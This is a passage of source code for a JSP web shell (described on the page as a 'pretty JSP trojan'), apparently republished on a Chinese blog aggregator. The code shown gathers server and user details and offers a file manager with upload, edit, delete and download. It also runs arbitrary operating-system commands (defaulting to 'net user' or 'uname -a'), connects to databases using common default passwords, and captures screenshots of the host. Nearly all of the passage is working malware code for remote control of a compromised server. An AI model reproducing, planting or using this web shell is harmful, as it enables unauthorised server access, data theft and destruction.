width="20%"><%=orChinese("OS") %></td> 956 <td width="80%"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " "+ System.getProperty("os.arch")%></td> 957 </tr> 958 <tr> 959 <td><%=orChinese("Computer Name") %></td> 960 <td><%=System.getenv().get("COMPUTERNAME")%></td> 961 </tr> 962 <tr> 963 <td><%=orChinese("Available Processors") %></td> 964 <td><%=Runtime.getRuntime().availableProcessors() %></td> 965 </tr> 966 <tr> 967 <td><%=orChinese("IP") %></td> 968 <td><%=InetAddress.getLocalHost().getHostAddress().toString() %></td> 969 </tr> 970 <tr> 971 <td><%=orChinese("System Driver") %></td> 972 <td><%=System.getenv().get("SystemDrive")%></td> 973 </tr> 974 <tr> 975 <td><%=orChinese("Driver Info") %></td> 976 <td><%=getDriverInfo() %></td> 977 </tr> 978 <tr> 979 <td><%=orChinese("User Name") %></td> 980 <td><%=System.getenv().get("USERNAME")%></td> 981 </tr> 982 <tr> 983 <td><%=orChinese("User Domain") %></td> 984 <td><%=System.getenv().get("USERDOMAIN")%></td> 985 </tr> 986 <tr> 987 <td><%=orChinese("User DNS Domain") %></td> 988 <td><%=System.getenv().get("USERDNSDOMAIN")%></td> 989 </tr> 990 <tr> 991 <td><%=orChinese("User Profile") %></td> 992 <td><%=System.getenv().get("USERPROFILE")%></td> 993 </tr> 994 <tr> 995 <td><%=orChinese("All User Profile") %></td> 996 <td><%=System.getenv().get("ALLUSERSPROFILE")%></td> 997 </tr> 998 <tr> 999 <td><%=orChinese("Temp") %></td> 1000 <td><%=System.getenv().get("TEMP")%></td> 1001 </tr> 1002 <tr> 1003 <td><%=orChinese("Program Files") %></td> 1004 <td><%=System.getenv().get("ProgramFiles")%></td> 1005 </tr> 1006 <tr> 1007 <td><%=orChinese("AppData") %></td> 1008 <td><%=System.getenv().get("APPDATA")%></td> 1009 </tr> 1010 <tr> 1011 <td><%=orChinese("System Root") %></td> 1012 <td><%=System.getenv().get("SystemRoot")%></td> 1013 </tr> 1014 <tr> 1015 <td><%=orChinese("Console") %></td> 1016 <td><%=System.getenv().get("ComSpec")%></td> 1017 </tr> 1018 <tr> 1019 <td><%=orChinese("File Executable") %></td> 1020 <td><%=System.getenv().get("PATHEXT")%></td> 1021 </tr> 1022 <tr> 1023 <td><%=orChinese("My Path") %></td> 1024 <td><%=request.getSession().getServletContext().getRealPath(request.getServletPath())%></td> 1025 </tr> 1026 <tr> 1027 <td><%=orChinese("User Dir") %></td> 1028 <td><%=System.getProperty("user.dir")%></td> 1029 </tr> 1030 <tr> 1031 <td><%=orChinese("Protocol") %></td> 1032 <td><%=request.getProtocol()%></td> 1033 </tr> 1034 <tr> 1035 <td><%=orChinese("Server Info") %></td> 1036 <td><%=application.getServerInfo()%></td> 1037 </tr> 1038 <tr> 1039 <td><%=orChinese("JDK Version") %></td> 1040 <td><%=System.getProperty("java.version")%></td> 1041 </tr> 1042 <tr> 1043 <td><%=orChinese("JDK Home") %></td> 1044 <td><%=System.getProperty("java.home")%></td> 1045 </tr> 1046 <tr> 1047 <td><%=orChinese("JVM Version") %></td> 1048 <td><%=System.getProperty("java.vm.specification.version")%></td> 1049 </tr> 1050 <tr> 1051 <td><%=orChinese("JVM Name") %></td> 1052 <td><%=System.getProperty("java.vm.name")%></td> 1053 </tr> 1054 <tr> 1055 <td><%=orChinese("Class Path") %></td> 1056 <td><%=System.getProperty("java.class.path")%></td> 1057 </tr> 1058 <tr> 1059 <td><%=orChinese("Java Library Path") %></td> 1060 <td><%=System.getProperty("java.library.path")%></td> 1061 </tr> 1062 <tr> 1063 <td><%=orChinese("Java tmpdir") %></td> 1064 <td><%=System.getProperty("java.io.tmpdir")%></td> 1065 </tr> 1066 <tr> 1067 <td><%=orChinese("Compiler") %></td> 1068 <td><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td> 1069 </tr> 1070 <tr> 1071 <td><%=orChinese("Java ext dirs") %></td> 1072 <td><%=System.getProperty("java.ext.dirs")%></td> 1073 </tr> 1074 <tr> 1075 <td><%=orChinese("Remote Addr") %></td> 1076 <td><%=request.getRemoteAddr()%></td> 1077 </tr> 1078 <tr> 1079 <td><%=orChinese("Remote Host") %></td> 1080 <td><%=request.getRemoteHost()%></td> 1081 </tr> 1082 <tr> 1083 <td><%=orChinese("Remote User") %></td> 1084 <td><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td> 1085 </tr> 1086 <tr> 1087 <td><%=orChinese("Scheme") %></td> 1088 <td><%=request.getScheme()%></td> 1089 </tr> 1090 <tr> 1091 <td><%=orChinese("Secure") %></td> 1092 <td><%=request.isSecure() == true ? orChinese("Yes") : orChinese("No") %></td> 1093 </tr> 1094 </table> 1095 <% 1096 } 1097 if (action.equals("file")) { 1098 String curPath = ""; 1099 String result = ""; 1100 String fsAction = ""; 1101 if (request.getParameter("curPath") == null) { 1102 curPath = request.getSession().getServletContext().getRealPath(request.getServletPath()); 1103 curPath = pathConvert((new File(curPath)).getParent()); 1104 } 1105 else { 1106 curPath = Unicode2GB((String)request.getParameter("curPath")); 1107 curPath = pathConvert(curPath); 1108 } 1109 if (request.getParameter("fsAction") == null) { 1110 fsAction = "list"; 1111 } else { 1112 fsAction = (String)request.getParameter("fsAction"); 1113 } 1114 if (fsAction.equals("list")){ 1115 %> 1116 <div class="container"> 1117 <form method="post" name="form3" action="<%= request.getRequestURI() + "?action=file"%>"> 1118 <div align="left"> 1119 1120 <input type="text" class="trans" size="100" name="curPath" value="<%=curPath%>" /> <input type="submit" value="<%=orChinese("GOTO") %>" 1121 class="trans" /> <input type="button" value="<%=orChinese("Home") %>" class="trans" 1122 onclick="javascript:document.getElementById(‘file_system‘).click();" /> 1123 <% 1124 String os = System.getProperties().getProperty("os.name"); 1125 if (os.toUpperCase().contains("WIN")){ 1126 File[] files = File.listRoots(); 1127 for(int i = 0; i < files.length; i++) { 1128 %> 1129 <input type="button" class="trans" 1130 onclick="javascript:window.location.href=‘<%= request.getRequestURI() + "?action=file&curPath=" + files[i].getPath().replace("\\\\", "/")%>‘" 1131 value="<%= files[i]%>" /> 1132 <% 1133 } 1134 } 1135 %> 1136 1137 </div> 1138 <table class="onhover" style="width: 100%"> 1139 <tr> 1140 <td align="center"><%=orChinese("File Name") %></td> 1141 <td align="center" width="10%"><%=orChinese("Size") %></td> 1142 <td align="center" width="38%"><%=orChinese("Operation") %></td> 1143 </tr> 1144 <tr> 1145 <% 1146 File curFolder = new File(curPath); 1147 %> 1148 <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=curFolder.getParent() %>">[..]</a></td> 1149 <td align="right"></td> 1150 <td></td> 1151 </tr> 1152 <% 1153 for (File file : this.getFolderList(curPath)){ 1154 MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath ); 1155 f.setHtmlOperation(Operation.Rename,Operation.Delete,Operation.Download); 1156 %> 1157 <tr> 1158 <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=f.getAbsolutePath() %>">[<%=f.getName() %>] 1159 </a></td> 1160 <td align="right"><%=f.getLength() %></td> 1161 <td><%=f.getHtmlOperation() %></td> 1162 </tr> 1163 <% 1164 } 1165 for (File file : this.getFileList(curPath)){ 1166 MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath ); 1167 f.setHtmlOperation(Operation.Edit,Operation.Rename,Operation.Delete,Operation.Download); 1168 %> 1169 <tr> 1170 <td><%=f.getName() %></td> 1171 <td align="right"><%=f.getLength() %></td> 1172 <td><%=f.getHtmlOperation() %></td> 1173 </tr> 1174 <% 1175 } 1176 %> 1177 </table> 1178 <div align="left"> 1179 <table style="width: 100%;"> 1180 <tr> 1181 <td align="left" style="border: 0"> 1182 <input type="text" name="uploadFilePath" id="uploadFilePath" size="60" class="trans" /> 1183 <input type="button" value="<%=orChinese("Select")%>" class="trans" onclick="javascript:document.getElementById(‘fileSelect‘).click()"> 1184 <input type="button" value="<%=orChinese("Upload")%>" class="trans" onclick="javascript:document.getElementById(‘uploadform‘).submit()" /> 1185 </td> 1186 <td align="right" style="border: 0"> 1187 <input type="text" id="createFileName" class="trans" size="26" name="fileName" /> 1188 <input type="button" class="trans" value="<%=orChinese("Create File")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFile"%>")‘> 1189 <input type="button" class="trans" value="<%=orChinese("Create Folder")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFolder"%>")‘> 1190 </td> 1191 </tr> 1192 </table> 1193 </div> 1194 </form> 1195 <div align="left"> 1196 <form id="uploadform" name="upload" enctype="multipart/form-data" method="post" 1197 action="<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=upload"%>"> 1198 <input type="file" style="display: none" name="upFile" id="fileSelect" 1199 onchange="javascript:document.getElementById(‘uploadFilePath‘).value=this.value" /> 1200 </form> 1201 </div> 1202 </div> 1203 1204 <% 1205 }else if (fsAction.equals("Edit")){ 1206 if (request.getParameter("fileName") == null) { 1207 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>"; 1208 } else { 1209 String fileName = Unicode2GB(request.getParameter("fileName").trim()); 1210 result = openFile(curPath, fileName, request.getRequestURI() + "?action=" + action); 1211 } 1212 }else if (fsAction.equals("save")) { 1213 if (request.getParameter("fileContent") == null) { 1214 result = "<font color=\\"red\\">"+orChinese("Content is null")+"</font>"; 1215 } else { 1216 if (request.getParameter("fileName") == null) { 1217 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>"; 1218 } else { 1219 String fileName = Unicode2GB(request.getParameter("fileName").trim()); 1220 String fileContent = Unicode2GB((String)request.getParameter("fileContent")); 1221 result = saveFile(curPath, fileName, request.getRequestURI() + "?action=" + action, fileContent); 1222 } 1223 } 1224 } else if (fsAction.equals("createFolder")) { 1225 if (request.getParameter("fileName") == null) { 1226 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>"; 1227 } else { 1228 String folderName = Unicode2GB(request.getParameter("fileName").trim()); 1229 if (folderName.equals("")) { 1230 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>"; 1231 } else { 1232 result = createFolder(curPath,folderName,request.getRequestURI() + "?action=" + action); 1233 } 1234 } 1235 } else if (fsAction.equals("createFile")) { 1236 if (request.getParameter("fileName") == null) { 1237 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("File name is null")+"</font></div>"; 1238 } else { 1239 String fileName = Unicode2GB(request.getParameter("fileName").trim()); 1240 if (fileName.equals("")) { 1241 result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("File name is null")+"</font></div>"; 1242 } else { 1243 result = createFile(curPath,fileName,request.getRequestURI() + "?action=" + action); 1244 } 1245 } 1246 } else if (fsAction.equals("Delete")) { 1247 String fileName= Unicode2GB(request.getParameter("fileName").trim()); 1248 result = deleteFile(curPath,fileName,request.getRequestURI() + "?action=" + action); 1249 } else if (fsAction.equals("upload")) { 1250 result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); 1251 } else if (fsAction.equals("Rename")) { 1252 String newName = Unicode2GB(request.getParameter("newName").trim()); 1253 String fileName = Unicode2GB(request.getParameter("fileName").trim()); 1254 result = rename(curPath,fileName,newName,request.getRequestURI() + "?action=" + action); 1255 } else if (fsAction.equals("Download")) { 1256 String fileName= Unicode2GB(request.getParameter("fileName").trim()); 1257 result = download(curPath,fileName,request.getRequestURI() + "?action=" + action, response); 1258 } 1259 %> 1260 <div class="container"> 1261 <font color="red"><%=result %></font> 1262 </div> 1263 <% 1264 } 1265 if (action.equals("search")) { 1266 String curPath = request.getSession().getServletContext().getRealPath(request.getServletPath()); 1267 curPath = pathConvert((new File(curPath)).getParent()); 1268 1269 String searchpath = Unicode2GB(request.getParameter("searchpath")); 1270 if (searchpath == null || searchpath.trim().length() == 0){ 1271 searchpath = curPath; 1272 } 1273 String searchsubfix = Unicode2GB(request.getParameter("searchsubfix")); 1274 if (searchsubfix == null || searchsubfix.trim().length() == 0){ 1275 searchsubfix = ".jsp .html .htm"; 1276 } 1277 String searchby = request.getParameter("searchby"); 1278 String ignorecase = request.getParameter("ignorecase"); 1279 String searchcontent = Unicode2GB(request.getParameter("searchcontent")); 1280 if (searchcontent == null || searchcontent.trim().length() == 0){ 1281 searchcontent = "index"; 1282 } 1283 String fsAction = request.getParameter("fsAction"); 1284 String searchResult = ""; 1285 if (fsAction != null){ 1286 searchResult = searchFile(searchpath, searchcontent , searchsubfix, "name".equals(searchby),"yes".equals(ignorecase)); 1287 } 1288 %> 1289 <form class="container" name="searchForm" method="post" action="<%=request.getRequestURI() + "?action=search&fsAction=search"%>"> 1290 <table> 1291 <tr> 1292 <td width="260px" align="right"><%=orChinese("Search from") %>:</td> 1293 <td><input type="text" id="searchpath" class="trans" name="searchpath" size="100" value="<%=searchpath %>" /></td> 1294 </tr> 1295 <tr> 1296 <td align="right"><%=orChinese("Search for file type") %>:</td> 1297 <td><input type="text" id="searchsubfix" class="trans" name="searchsubfix" size="100" value="<%=searchsubfix %>" /></td> 1298 </tr> 1299 <tr> 1300 <td align="right"><%=orChinese("Setting") %>:</td> 1301 <td> 1302 <% 1303 if ("content".equals(searchby)){ 1304 %> <input type="radio" class="trans" name="searchby" value="name" /><%=orChinese("Search by Name") %> <input type="radio" name="searchby" 1305 class="trans" value="content" checked="checked" /><%=orChinese("Search by Content") %> <% 1306 }else{ 1307 %> <input type="radio" class="trans" name="searchby" value="name" checked="checked" /><%=orChinese("Search by Name") %> <input type="radio" 1308 name="searchby" class="trans" value="content" /><%=orChinese("Search by Content") %> <% 1309 } 1310 if ("yes".equals(ignorecase)){ 1311 %> <input type="checkbox" name="ignorecase" class="trans" value="yes" checked="checked" /><%=orChinese("Ignore Case") %> <% 1312 }else{ 1313 %> <input type="checkbox" name="ignorecase" class="trans" value="yes" /><%=orChinese("Ignore Case") %> <% 1314 } 1315 %> 1316 </td> 1317 </tr> 1318 <tr> 1319 <td align="right"><%=orChinese("Search keyword") %>:</td> 1320 <td><input type="text" id="searchcontent" class="trans" name="searchcontent" size="40" value="<%=searchcontent %>" /> <input type="submit" 1321 value="<%=orChinese("Search") %>" class="trans" /></td> 1322 </tr> 1323 <tr> 1324 <td colspan="2" align="left" id="searchresult"><%=searchResult %></td> 1325 </tr> 1326 </table> 1327 </form> 1328 <% 1329 } 1330 if (action.equals("command")) { 1331 String cmd = ""; 1332 InputStream ins = null; 1333 String result = ""; 1334 1335 if (request.getParameter("command") != null) { 1336 cmd = (String)request.getParameter("command"); 1337 result = exeCmd(cmd); 1338 } 1339 %> 1340 <form class="container" name="form2" method="post" action="<%=request.getRequestURI() + "?action=command"%>"> 1341 <% 1342 if (cmd==null || "".equals(cmd.trim())){ 1343 if (System.getProperty("os.name").toLowerCase().contains("windows")){ 1344 cmd = "cmd.exe /c net user"; 1345 }else{ 1346 cmd = "uname -a"; 1347 } 1348 } 1349 %> 1350 <div align="left"> 1351 <input type="text" size="130" class="trans" size="133" name="command" value="<%=cmd%>" /> <input type="submit" class="trans" 1352 value="<%=orChinese("Execute") %>" /> 1353 </div> 1354 <table style="width: 100%; height: 100px"> 1355 <tr> 1356 <td><%=result == "" ? " " : result%></td> 1357 </tr> 1358 </table> 1359 </form> 1360 <% 1361 } 1362 if (action.equals("database")) { 1363 String SQLResult = ""; 1364 String dbType = request.getParameter("dbType"); 1365 dbType = dbType == null?"mysql":dbType; 1366 String driver = request.getParameter("driver"); 1367 String port = request.getParameter("port"); 1368 String dbname = Unicode2GB(request.getParameter("dbname")); 1369 String host = Unicode2GB(request.getParameter("host")); 1370 String sql = Unicode2GB(request.getParameter("sql")); 1371 String dbuser = Unicode2GB(request.getParameter("dbuser")); 1372 String dbpass = Unicode2GB(request.getParameter("dbpass")); 1373 String fsAction = request.getParameter("fsAction"); 1374 String connurl = Unicode2GB(request.getParameter("connurl")); 1375 if (sql==null) sql=""; 1376 if (fsAction == null || "typeChange".equals(fsAction)){ 1377 if ("Mysql".equalsIgnoreCase(dbType)){ 1378 driver = "com.mysql.jdbc.Driver"; 1379 port = "3306"; 1380 dbuser = "root"; 1381 dbpass = "root"; 1382 host = "localhost"; 1383 dbname = "mysql"; 1384 }else if("Oracle".equalsIgnoreCase(dbType)){ 1385 driver = "oracle.jdbc.driver.OracleDriver"; 1386 port = "1521"; 1387 dbuser = "scott"; 1388 dbpass = "tiger"; 1389 host = "localhost"; 1390 dbname = "orcl"; 1391 }else if("SQLServer".equalsIgnoreCase(dbType)){ 1392 driver = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; 1393 port = "1433"; 1394 dbuser = "sa"; 1395 dbpass = "123456"; 1396 host = "localhost"; 1397 dbname = "master"; 1398 }else if("DB2".equalsIgnoreCase(dbType)){ 1399 driver = "com.ibm.db2.jdbc.app.DB2Driver"; 1400 port = "5000"; 1401 dbuser = "db2admin"; 1402 dbpass = "123456"; 1403 host = "localhost"; 1404 dbname = ""; 1405 }else if("Other".equalsIgnoreCase(dbType)){ 1406 driver = "sun.jdbc.odbc.JdbcOdbcDriver"; 1407 connurl = "jdbc:odbc:dsn=dsnName;User=username;Password=password"; 1408 dbuser = ""; 1409 dbpass = ""; 1410 } 1411 }else if("connect".equals(fsAction)){ 1412 if (driver!=null){ 1413 Class.forName(driver); 1414 if ("Mysql".equalsIgnoreCase(dbType)){ 1415 connurl = "jdbc:mysql://localhost:"+port+"/" + dbname; 1416 }else if("Oracle".equalsIgnoreCase(dbType)){ 1417 connurl = "jdbc:oracle:[email protected]:"+port+":"+ dbname; 1418 }else if("SQLServer".equalsIgnoreCase(dbType)){ 1419 connurl = "jdbc:sqlserver://localhost:"+port+";databaseName=" + dbname; 1420 }else if("DB2".equalsIgnoreCase(dbType)){ 1421 connurl = "jdbc:db2://localhost:"+port+"/" + dbname; 1422 } 1423 SQLResult = this.DBConnect(connurl, dbuser, dbpass); 1424 } 1425 }else if("disconnect".equals(fsAction)){ 1426 try { 1427 if (dbStatement != null) { 1428 dbStatement.close(); 1429 dbStatement = null; 1430 } 1431 if (conn != null) { 1432 conn.close(); 1433 conn = null; 1434 } 1435 } catch (SQLException e) { 1436 1437 } 1438 }else if("execute".equals(fsAction)){ 1439 SQLResult = DBExecute(sql); 1440 } 1441 %> 1442 <form class="container" id="sqlform" name="sqlform" method="post" action="<%=request.getRequestURI() + "?action=database"%>"> 1443 <table style="width: 100%;"> 1444 <tr> 1445 <td align="right" width="15%"><%=orChinese("Database Type") %>:</td> 1446 <td align="left" width="85%"><select id="dbtype_select" name=dbType style="background-color: black; color: white" 1447 onchange="dbsubmit(‘typeChange‘)"> 1448 <% 1449 if ("Mysql".equalsIgnoreCase(dbType)){ 1450 %> 1451 <option value="Mysql" selected="selected">Mysql</option> 1452 <option value="Oracle">Oracle</option> 1453 <option value="SQLServer">SQLServer</option> 1454 <option value="DB2">DB2</option> 1455 <option value="Other">Other</option> 1456 <% 1457 }else if("Oracle".equalsIgnoreCase(dbType)){ 1458 %> 1459 <option value="Mysql">Mysql</option> 1460 <option value="Oracle" selected="selected">Oracle</option> 1461 <option value="SQLServer">SQLServer</option> 1462 <option value="DB2">DB2</option> 1463 <option value="Other">Other</option> 1464 <% 1465 }else if("DB2".equalsIgnoreCase(dbType)){ 1466 %> 1467 <option value="Mysql">Mysql</option> 1468 <option value="Oracle">Oracle</option> 1469 <option value="SQLServer">SQLServer</option> 1470 <option value="DB2" selected="selected">DB2</option> 1471 <option value="Other">Other</option> 1472 <% 1473 }else if("SQLServer".equalsIgnoreCase(dbType)){ 1474 %> 1475 <option value="Mysql">Mysql</option> 1476 <option value="Oracle">Oracle</option> 1477 <option value="SQLServer" selected="selected">SQLServer</option> 1478 <option value="DB2">DB2</option> 1479 <option value="Other">Other</option> 1480 <% 1481 }else if("Other".equalsIgnoreCase(dbType)){ 1482 %> 1483 <option value="Mysql">Mysql</option> 1484 <option value="Oracle">Oracle</option> 1485 <option value="SQLServer">SQLServer</option> 1486 <option value="DB2">DB2</option> 1487 <option value="Other" selected="selected">Other</option> 1488 <% 1489 } 1490 %> 1491 </select></td> 1492 </tr> 1493 1494 <tr> 1495 <td align="right"><%=orChinese("Driver") %>:</td> 1496 <td align="left"><input type="text" size="50" class="trans" name="driver" value="<%=driver %>" /></td> 1497 </tr> 1498 <% 1499 if ("Other".equalsIgnoreCase(dbType)){ 1500 %> 1501 <tr> 1502 <td align="right"><%=orChinese("Connect URL") %>:</td> 1503 <td align="left"><input type="text" size="50" class="trans" name="connurl" value="<%=connurl %>" /></td> 1504 </tr> 1505 <% 1506 }else{ 1507 %> 1508 <tr> 1509 <td align="right"><%=orChinese("Host") %>:</td> 1510 <td align="left"><input type="text" size="50" class="trans" name="host" value="<%=host %>" /></td> 1511 </tr> 1512 <tr> 1513 <td align="right"><%=orChinese("Port") %>:</td> 1514 <td align="left"><input type="text" size="50" class="trans" name="port" value="<%=port %>" /></td> 1515 </tr> 1516 <tr> 1517 <td align="right"><%=orChinese("DB Name") %>:</td> 1518 <td align="left"><input type="text" size="50" class="trans" name="dbname" value="<%=dbname %>" /></td> 1519 </tr> 1520 <% 1521 } 1522 %> 1523 <tr> 1524 <td align="right"><%=orChinese("Username") %>:</td> 1525 <td align="left"><input type="text" size="50" class="trans" name="dbuser" value="<%=dbuser %>" /></td> 1526 </tr> 1527 <tr> 1528 <td align="right"><%=orChinese("Password") %>:</td> 1529 <td align="left"><input type="text" size="50" class="trans" name="dbpass" value="<%=dbpass %>" /></td> 1530 </tr> 1531 <tr> 1532 <td align="right"><%=orChinese("Connect") %>:</td> 1533 <td align="left"><input type="button" class="trans" value="<%=orChinese("Connect") %>" onclick="dbsubmit(‘connect‘)" /> <input type="button" 1534 class="trans" value="<%=orChinese("Disconnect") %>" onclick="dbsubmit(‘disconnect‘)" /></td> 1535 </tr> 1536 <tr> 1537 <td align="right"><%=orChinese("SQL") %>:</td> 1538 <td><input type="text" class="trans" size="100" name="sql" value="<%=sql %>" /> <input type="submit" class="trans" 1539 value="<%=orChinese("Execute") %>" onclick="dbsubmit(‘execute‘)" /></td> 1540 </tr> 1541 <tr height="50"> 1542 <td colspan="2"><%=SQLResult %></td> 1543 <tr /> 1544 </table> 1545 </form> 1546 <%} 1547 if (action.equals("screen")){ 1548 %> 1549 <div class="container" align="left"> 1550 <input type="button" value="<%=orChinese("Refresh") %>" class="trans" onclick="javascript:location = location" /> 1551 <img style="-webkit-user-select: none; cursor: zoom-in;" width="100%" src="<%=request.getRequestURI()+"?action=getscreen" %>" /> 1552 </div> 1553 <% 1554 } 1555 if (action.equals("getscreen")){ 1556 out.clear(); 1557 out = pageContext.pushBody(); 1558 this.getScreenImg(request, response); 1559 } 1560 %> 1561 <%}%> 1562 <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=ENG" %>‘,window.location.href)">English</a> 1563 <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=CHN" %>‘,window.location.href)">中文</a> 1564 </body> 1565 </html>
截图:
以上是关于漂亮的JSP木马的主要内容,如果未能解决你的问题,请参考以下文章
谷歌浏览器调试jsp 引入代码片段,如何调试代码片段中的js